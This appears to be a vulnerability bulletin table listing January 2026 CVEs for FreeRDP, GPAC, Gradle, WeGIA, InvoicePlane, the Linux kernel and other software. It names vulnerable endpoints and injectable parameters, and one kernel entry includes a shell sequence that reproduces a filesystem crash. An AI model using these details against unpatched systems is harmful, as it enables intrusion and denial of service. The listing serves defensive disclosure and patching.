| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, RDPEAR's NDR array reader does not perform bounds checking on the on‑wire element count and can write past the heap buffer allocated from hints, causing a heap buffer overflow in ndr_read_uint8Array. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22853 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-47v9-p4gp-w5ch https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a heap-buffer-overflow occurs in drive read when a server-controlled read length is used to read file data into an IRP output stream buffer without a hard upper bound, allowing an oversized read to overwrite heap memory. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22854 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-47vj-g3c3-3rmf https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a heap out-of-bounds read occurs in the smartcard SetAttrib path when cbAttrLen does not match the actual NDR buffer length. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22855 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rwp3-g84r-6mx9 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a race in the serial channel IRP thread tracking allows a heap use‑after‑free when one thread removes an entry from serial->IrpThreads while another reads it. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22856 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-w842-c386-fxhv https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a heap use-after-free occurs in irp_thread_func because the IRP is freed by irp->Complete() and then accessed again on the error path. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22857 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-4gxq-jhq6-4cr8 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, global-buffer-overflow was observed in FreeRDP's Base64 decoding path. The root cause appears to be implementation-defined char signedness: on Arm/AArch64 builds, plain char is treated as unsigned, so the guard c <= 0 can be optimized into a simple c != 0 check. As a result, non-ASCII bytes (e.g., 0x80-0xFF) may bypass the intended range restriction and be used as an index into a global lookup table, causing out-of-bounds access. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22858 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-qmqf-m84q-x896 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, the URBDRC client does not perform bounds checking on server‑supplied MSUSB_INTERFACE_DESCRIPTOR values and uses them as indices in libusb_udev_complete_msconfig_setup, causing an out‑of‑bounds read. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22859 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-56f5-76qv-2r36 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| Google--Android | In key-based pairing, there is a possible ID due to a logic error in the code. This could lead to remote (proximal/adjacent) information disclosure of user's conversations and location with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-01-15 | not yet calculated | CVE-2025-36911 | https://source.android.com/security/bulletin/pixel/2026-01-01 |
| Google--Google Devices | In cpm_fwtp_msg_handler of cpm/google/lib/tracepoint/cpm_fwtp_ipc.c, there is a possible memory overwrite due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-01-16 | not yet calculated | CVE-2025-48647 | https://source.android.com/docs/security/bulletin/pixel/2026/2026-01-01 |
| Google--Keras | Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape. | 2026-01-15 | not yet calculated | CVE-2026-0897 | https://github.com/keras-team/keras/pull/21880 |
| GPAC--GPAC | GPAC v2.4.0 was discovered to contain an out-of-bounds read in the oggdmx_parse_tags function. | 2026-01-15 | not yet calculated | CVE-2025-70298 | https://github.com/zakkanijia/POC/blob/main/dmx_ogg/GPAC_oggdmx_parse_tags_offbyone.md |
| GPAC--GPAC | A heap overflow in the avi_parse_input_file() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted AVI file. | 2026-01-15 | not yet calculated | CVE-2025-70299 | https://github.com/zakkanijia/POC/blob/main/gpac_avi/GPAC_AVI_indx_heap_overflow.md |
| GPAC--GPAC | A heap overflow in the ghi_dmx_declare_opid_bin() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-01-15 | not yet calculated | CVE-2025-70302 | https://github.com/zakkanijia/POC/blob/main/gpac_ghi/ghi.md |
| GPAC--GPAC | A heap overflow in the uncv_parse_config() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file. | 2026-01-15 | not yet calculated | CVE-2025-70303 | https://github.com/zakkanijia/POC/blob/main/gpac_uncv/GPAC_UNCV_CPAT.md |
| GPAC--GPAC | A buffer overflow in the vobsub_get_subpic_duration() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted packet. | 2026-01-15 | not yet calculated | CVE-2025-70304 | https://github.com/zakkanijia/POC/blob/main/gpac_vobsub/GPAC_vobsub.md |
| GPAC--GPAC | A stack overflow in the dmx_saf function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted .saf file. | 2026-01-15 | not yet calculated | CVE-2025-70305 | https://github.com/zakkanijia/POC/blob/main/gpac_saf/GPAC_SAF.md |
| GPAC--GPAC | A stack overflow in the dump_ttxt_sample function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted packet. | 2026-01-15 | not yet calculated | CVE-2025-70307 | https://github.com/zakkanijia/POC/blob/main/gpac_boxDump/GPAC_tx3g.md |
| GPAC--GPAC | An out-of-bounds read in the GSF demuxer filter component of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted .gsf file. | 2026-01-15 | not yet calculated | CVE-2025-70308 | https://github.com/zakkanijia/POC/blob/main/gpac_gsf/GPAC_gsf.md |
| GPAC--GPAC | A stack overflow in the pcmreframe_flush_packet function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted WAV file. | 2026-01-15 | not yet calculated | CVE-2025-70309 | https://github.com/zakkanijia/POC/blob/main/gpac_rawpcm/GPAC_RFPCM.md |
| GPAC--GPAC | A heap overflow in the vorbis_to_intern() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted .ogg file. | 2026-01-15 | not yet calculated | CVE-2025-70310 | https://github.com/zakkanijia/POC/blob/main/gpac_dec_vorbis/GPAC_VORBIS.md |
| gradle--gradle | Gradle is a build automation tool, and its native-platform tool provides Java bindings for native APIs. When resolving dependencies in versions before 9.3.0, some exceptions were not treated as fatal errors and would not cause a repository to be disabled. If a build encountered one of these exceptions, Gradle would continue to the next repository in the list and potentially resolve dependencies from a different repository. If a Gradle build used an unresolvable host name, Gradle would continue to work as long as all dependencies could be resolved from another repository. An unresolvable host name could be caused by allowing a repository's domain name registration to lapse or typo-ing the real domain name. This behavior could allow an attacker to register a service under the host name used by the build and serve malicious artifacts. The attack requires the repository to be listed before others in the build configuration. Gradle has introduced a change in behavior in Gradle 9.3.0 to stop searching other repositories when encountering these errors. | 2026-01-16 | not yet calculated | CVE-2026-22816 | https://github.com/gradle/gradle/security/advisories/GHSA-w78c-w6vf-rw82 https://github.com/gradle/gradle/commit/e5707d0d8fce3d768c9c489004700d78eab1773a |
| gradle--gradle | Gradle is a build automation tool, and its native-platform tool provides Java bindings for native APIs. When resolving dependencies in versions before 9.3.0, some exceptions were not treated as fatal errors and would not cause a repository to be disabled. If a build encountered one of these exceptions, Gradle would continue to the next repository in the list and potentially resolve dependencies from a different repository. An exception like NoHttpResponseException can indicate transient errors. If the errors persist after a maximum number of retries, Gradle would continue to the next repository. This behavior could allow an attacker to disrupt the service of a repository and leverage another repository to serve malicious artifacts. This attack requires the attacker to have control over a repository after the disrupted repository. Gradle has introduced a change in behavior in Gradle 9.3.0 to stop searching other repositories when encountering these errors. | 2026-01-16 | not yet calculated | CVE-2026-22865 | https://github.com/gradle/gradle/security/advisories/GHSA-mqwm-5m85-gmcv |
| graphql-hive--graphql-modules | GraphQL Modules is a toolset of libraries and guidelines dedicated to create reusable, maintainable, testable and extendable modules out of your GraphQL server. From 2.2.1 to before 2.4.1 and 3.1.1, when 2 or more parallel requests are made which trigger the same service, the context of the requests is mixed up in the service when the context is injected via @ExecutionContext(). ExecutionContext is often used to pass authentication tokens from incoming requests to services loading data from backend APIs. This vulnerability is fixed in 2.4.1 and 3.1.1. | 2026-01-16 | not yet calculated | CVE-2026-23735 | https://github.com/graphql-hive/graphql-modules/security/advisories/GHSA-53wg-r69p-v3r7 https://github.com/graphql-hive/graphql-modules/issues/2613 https://github.com/graphql-hive/graphql-modules/pull/2521 https://github.com/graphql-hive/graphql-modules/releases/tag/release-1768575025568 |
| Home Security System--D3D | D3D Wi-Fi Home Security System ZX-G12 v2.1.1 is vulnerable to RF replay attacks on the 433 MHz sensor communication channel. The system does not implement rolling codes, message authentication, or anti-replay protection, allowing an attacker within RF range to record valid alarm/control frames and replay them to trigger false alarms. | 2026-01-12 | not yet calculated | CVE-2025-65552 | http://d3d.com https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65552 |
| Home Security System--D3D | D3D Wi-Fi Home Security System ZX-G12 v2.1.17 is susceptible to RF jamming on the 433 MHz alarm sensor channel. An attacker within RF range can transmit continuous interference to block sensor transmissions, resulting in missed alarms and loss of security monitoring. The device lacks jamming detection or mitigations, creating a denial-of-service condition that may lead to undetected intrusions or failure to trigger safety alerts. | 2026-01-12 | not yet calculated | CVE-2025-65553 | http://d3d.com https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65553 |
| https://github.com/linrunner--TLP | An Improper Authentication vulnerability in TLP allows local users to arbitrarily control the power profile in use as well as the daemon's log settings. This issue affects TLP: from 1.9 before 1.9.1. | 2026-01-14 | not yet calculated | CVE-2025-67859 | https://security.opensuse.org/2026/01/07/tlp-polkit-authentication-bypass.html https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-67859 |
| https://github.com/ShadowBlip--inputplumber | Polkit authentication is disabled by default, and a race condition in the Polkit authorization check in versions before v0.69.0 can lead to the same issues as in CVE-2025-66005. | 2026-01-14 | not yet calculated | CVE-2025-14338 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-14338 https://security.opensuse.org/2026/01/09/inputplumber-lack-of-dbus-auth.html |
| https://github.com/ShadowBlip--inputplumber | Lack of authorization of the InputManager D-Bus interface in InputPlumber versions before v0.63.0 can lead to local Denial-of-Service, information leak or even privilege escalation in the context of the currently active user session. | 2026-01-14 | not yet calculated | CVE-2025-66005 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66005 https://security.opensuse.org/2026/01/09/inputplumber-lack-of-dbus-auth.html |
| Hubert Imoveis--Hubert Imoveis | An arbitrary file upload vulnerability in the /utils/uploadFile component of Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 allows attackers to execute arbitrary code via uploading a crafted PDF file. | 2026-01-13 | not yet calculated | CVE-2025-65783 | http://hub.com http://hubert.com https://github.com/carlos-artmann/vulnerability-research/tree/main/CVE-2025-65783 |
| Hubert Imoveis--Hubert Imoveis | Insecure permissions in Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 allows authenticated attackers with low-level privileges to access other users' information via a crafted API request. | 2026-01-13 | not yet calculated | CVE-2025-65784 | http://hub.com http://hubert.com https://github.com/carlos-artmann/vulnerability-research/tree/main/CVE-2025-65784 |
| HumanSignal--label-studio | Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users' browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim's API token or call token reset endpoints - enabling full account takeover and unauthorized API access. | 2026-01-12 | not yet calculated | CVE-2026-22033 | https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch https://github.com/HumanSignal/label-studio/pull/9084 https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to cause mismanagement of reference counting to cause a potential use after free. Improper reference counting on an internal resource caused scenario where potential for use after free was present. | 2026-01-13 | not yet calculated | CVE-2025-10865 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Intermediate register values of secure workloads can be exfiltrated in workloads scheduled from applications running in the non-secure environment of a platform. | 2026-01-13 | not yet calculated | CVE-2025-25176 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to subvert GPU HW to write to arbitrary physical memory pages. Under certain circumstances this exploit could be used to corrupt data pages not allocated by the GPU driver but memory pages in use by the kernel and drivers running on the platform altering their behaviour. This attack can lead the GPU to perform write operations on restricted internal GPU buffers that can lead to a second order affect of corrupted arbitrary physical memory. | 2026-01-13 | not yet calculated | CVE-2025-58409 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to cause mismanagement of resources reference counting creating a potential use after free scenario. Improper resource management and reference counting on an internal resource caused scenario where potential write use after free was present. | 2026-01-13 | not yet calculated | CVE-2025-58411 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imaster--MEMS Events CRM | Imaster's MEMS Events CRM contains an SQL injection vulnerability in the 'keyword' parameter in '/memsdemo/exchange_offers.php'. | 2026-01-12 | not yet calculated | CVE-2025-41005 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| Imaster--MEMS Events CRM | Imaster's MEMS Events CRM contains an SQL injection vulnerability in the 'phone' parameter in '/memsdemo/login.php'. | 2026-01-12 | not yet calculated | CVE-2025-41006 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| Imaster--Patient Record Management System | Imaster's Patient Record Management System contains a stored Cross-Site Scripting (XSS) vulnerability in the endpoint '/projects/hospital/admin/edit_patient.php'. By injecting a malicious script into the 'firstname' parameter, the JavaScript code is stored and executed every time a user accesses the patient list, allowing an attacker to execute arbitrary JavaScript in a victim's browser. | 2026-01-12 | not yet calculated | CVE-2025-41003 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| Imaster--Patient Record Management System | Imaster's Patient Records Management System is vulnerable to SQL Injection in the endpoint '/projects/hospital/admin/complaints.php' through the 'id' parameter. | 2026-01-12 | not yet calculated | CVE-2025-41004 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| InvoicePlane--InvoicePlane | An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in "maxQuantity" and "minQuantity" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing of single quotes. | 2026-01-15 | not yet calculated | CVE-2025-67082 | https://github.com/InvoicePlane/InvoicePlane https://www.helx.io/blog/advisory-invoice-plane/ |
| InvoicePlane--InvoicePlane | Directory traversal vulnerability in InvoicePlane through 1.6.3 allows unauthenticated attackers to read files from the server. The ability to read files and the file type depends on the web server and its configuration. | 2026-01-15 | not yet calculated | CVE-2025-67083 | https://github.com/InvoicePlane/InvoicePlane https://www.helx.io/blog/advisory-invoice-plane/ |
| InvoicePlane--InvoicePlane | File upload vulnerability in InvoicePlane through 1.6.3 allows authenticated attackers to upload arbitrary PHP files into attachments, which can later be executed remotely, leading to Remote Code Execution (RCE). | 2026-01-15 | not yet calculated | CVE-2025-67084 | https://github.com/InvoicePlane/InvoicePlane https://www.helx.io/blog/advisory-invoice-plane/ |
| ippprint--Sagemcom | Buffer Overflow in the ippprint (Internet Printing Protocol) service in Sagemcom F@st 3686 MAGYAR_4.121.0 allows remote attacker to execute arbitrary code by sending a crafted HTTP request. | 2026-01-12 | not yet calculated | CVE-2025-29329 | http://sagemcom.com http://fst.com https://github.com/SilverS3c/Sagemcom-fast-3686-ippprint |
| isaacs--node-tar | node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. | 2026-01-16 | not yet calculated | CVE-2026-23745 | https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e |
| Itflow--Itflow | An SQL injection vulnerability in Itflow through 25.06 has been identified in the "role_id" parameter when editing a profile. An attacker with an admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing of an integer parameter. | 2026-01-15 | not yet calculated | CVE-2025-67081 | https://github.com/itflow-org/itflow https://www.helx.io/blog/advisory-itflow/ |
| KACE--KACE | Quest KACE Desktop Authority through 11.3.1 has Insecure Permissions on the Named Pipes used for inter-process communication. | 2026-01-12 | not yet calculated | CVE-2025-67813 | https://quest.com https://support.quest.com/kb/4381743/quest-kace-desktop-authority-insecure-named-pipe-permissions-cve-2025-67813 |
| kashipara--kashipara | A SQL Injection was found in the /exam/user/profile.php page of kashipara Online Exam System V1.0, which allows remote attackers to execute arbitrary SQL command to get unauthorized database access via the rname, rcollage, rnumber, rgender and rpassword parameters in a POST HTTP request. | 2026-01-12 | not yet calculated | CVE-2025-51567 | https://github.com/0xBhushan/Writeups/blob/main/CVE/Kashipara/Online%20Exam%20System/SQL%20Injection-Profile%20Update.pdf |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the html/pet/adotantes/cadastro_adotante.php and html/pet/adotantes/informacao_adotantes.php endpoint of the WeGIA application. The application does not sanitize user-controlled input before rendering it inside the Adopters Information table, allowing persistent JavaScript injection. Any user who visits the page will have the payload executed automatically. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23725 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-c85q-4fwg-99gw https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=TipoEntradaControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23726 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-h7qx-j7g3-7fx3 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=TipoSaidaControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23727 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmq9-8p4w-m4f3 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=DestinoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23728 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jf25-p56f-wpgh https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarDescricao and nomeClasse=ProdutoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23729 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-w88p-v7h6-m728 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=ProdutoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23730 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6gx4-6gwv-cxc3 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LangChain AI--LangChain | LangChain versions up to and including 0.3.1 contain a regular expression denial-of-service (ReDoS) vulnerability in the MRKLOutputParser.parse() method (libs/langchain/langchain/agents/mrkl/output_parser.py). The parser applies a backtracking-prone regular expression when extracting tool actions from model output. An attacker who can supply or influence the parsed text (for example via prompt injection in downstream applications that pass LLM output directly into MRKLOutputParser.parse()) can trigger excessive CPU consumption by providing a crafted payload, causing significant parsing delays and a denial-of-service condition. | 2026-01-12 | not yet calculated | CVE-2024-58340 | https://huntr.com/bounties/e7ece02c-d4bb-4166-8e08-6baf4f8845bb https://www.langchain.com/ https://github.com/langchain-ai/langchain https://www.vulncheck.com/advisories/langchain-mrkloutputparser-redos |
| Lemonsoft--WordPress add-on | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Lemonsoft WordPress add on allows Cross-Site Scripting (XSS). This issue affects WordPress add on: 2025.7.1. | 2026-01-13 | not yet calculated | CVE-2025-9427 | https://lemondoc.atlassian.net/wiki/spaces/LEMONSHOP/pages/754909038/Versiohistoria+-+Lemonsoft+integration+lis+osa |
| Libsndfile--Libsndfile | Libsndfile <=1.2.2 contains a memory leak vulnerability in the mpeg_l3_encoder_init() function within the mpeg_l3_encode.c file. | 2026-01-14 | not yet calculated | CVE-2025-56226 | https://github.com/libsndfile/libsndfile/issues/1089 https://gist.github.com/Sisyphus-wang/f9e6e017b7d478bebee6e8187672abc8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: Verify inode mode when loading from disk syzbot is reporting that S_IFMT bits of inode->i_mode can become bogus when the S_IFMT bits of the 16bits "mode" field loaded from disk are corrupted. According to [1], the permissions field was treated as reserved in Mac OS 8 and 9. According to [2], the reserved field was explicitly initialized with 0, and that field must remain 0 as long as reserved. Therefore, when the "mode" field is not 0 (i.e. no longer reserved), the file must be S_IFDIR if dir == 1, and the file must be one of S_IFREG/S_IFLNK/S_IFCHR/S_IFBLK/S_IFIFO/S_IFSOCK if dir == 0. | 2026-01-13 | not yet calculated | CVE-2025-68767 | https://git.kernel.org/stable/c/6f768724aabd5b321c5b8f15acdca11e4781cf32 https://git.kernel.org/stable/c/d92333c7a35856e419500e7eed72dac1afa404a5 https://git.kernel.org/stable/c/001f44982587ad462b3002ee40c75e8df67d597d https://git.kernel.org/stable/c/05ec9af3cc430683c97f76027e1c55ac6fd25c59 https://git.kernel.org/stable/c/edfb2e602b5ba5ca6bf31cbac20b366efb72b156 https://git.kernel.org/stable/c/91f114bffa36ce56d0e1f60a0a44fc09baaefc79 https://git.kernel.org/stable/c/005d4b0d33f6b4a23d382b7930f7a96b95b01f39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inet: frags: flush pending skbs in fqdir_pre_exit() We have been seeing occasional deadlocks on pernet_ops_rwsem since September in NIPA. The stuck task was usually modprobe (often loading a driver like ipvlan), trying to take the lock as a Writer. lockdep does not track readers for rwsems so the read wasn't obvious from the reports. On closer inspection the Reader holding the lock was conntrack looping forever in nf_conntrack_cleanup_net_list(). Based on past experience with occasional NIPA crashes I looked thru the tests which run before the crash and noticed that the crash follows ip_defrag.sh. An immediate red flag. Scouring thru (de)fragmentation queues reveals skbs sitting around, holding conntrack references. The problem is that since conntrack depends on nf_defrag_ipv6, nf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its netns exit hooks run _after_ conntrack's netns exit hook. Flush all fragment queue SKBs during fqdir_pre_exit() to release conntrack references before conntrack cleanup runs. Also flush the queues in timer expiry handlers when they discover fqdir->dead is set, in case packet sneaks in while we're running the pre_exit flush. The commit under Fixes is not exactly the culprit, but I think previously the timer firing would eventually unblock the spinning conntrack. | 2026-01-13 | not yet calculated | CVE-2025-68768 | https://git.kernel.org/stable/c/c70df25214ac9b32b53e18e6ae3b8f073ffa6903 https://git.kernel.org/stable/c/006a5035b495dec008805df249f92c22c89c3d2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix return value of f2fs_recover_fsync_data() With below scripts, it will trigger panic in f2fs: mkfs.f2fs -f /dev/vdd mount /dev/vdd /mnt/f2fs touch /mnt/f2fs/foo sync echo 111 >> /mnt/f2fs/foo f2fs_io fsync /mnt/f2fs/foo f2fs_io shutdown 2 /mnt/f2fs umount /mnt/f2fs mount -o ro,norecovery /dev/vdd /mnt/f2fs or mount -o ro,disable_roll_forward /dev/vdd /mnt/f2fs F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 0 F2FS-fs (vdd): Mounted with checkpoint version = 7f5c361f F2FS-fs (vdd): Stopped filesystem due to reason: 0 F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 1 Filesystem f2fs get_tree() didn't set fc->root, returned 1 ------------[ cut here ]------------ kernel BUG at fs/super.c:1761! Oops: invalid opcode: 0000 [#1] SMP PTI CPU: 3 UID: 0 PID: 722 Comm: mount Not tainted 6.18.0-rc2+ #721 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:vfs_get_tree.cold+0x18/0x1a Call Trace: <TASK> fc_mount+0x13/0xa0 path_mount+0x34e/0xc50 __x64_sys_mount+0x121/0x150 do_syscall_64+0x84/0x800 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7fa6cc126cfe The root cause is we missed to handle the error number returned from f2fs_recover_fsync_data() when mounting an image w/ the ro,norecovery or ro,disable_roll_forward mount option, resulting in returning a positive error number to vfs_get_tree(), fix it. | 2026-01-13 | not yet calculated | CVE-2025-68769 | https://git.kernel.org/stable/c/e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725 https://git.kernel.org/stable/c/0de4977a1eeafe9d77701e3c031a1bcdba389243 https://git.kernel.org/stable/c/9bc246018aaa3b46a7710428d0a2196c229f9d49 https://git.kernel.org/stable/c/a4c67d96f92eefcfa5596a08f069e77b743c5865 https://git.kernel.org/stable/c/473550e715654ad7612aa490d583cb7c25fe2ff3 https://git.kernel.org/stable/c/4560db9678a2c5952b6205fbca468c6805c2ba2a https://git.kernel.org/stable/c/01fba45deaddcce0d0b01c411435d1acf6feab7b |
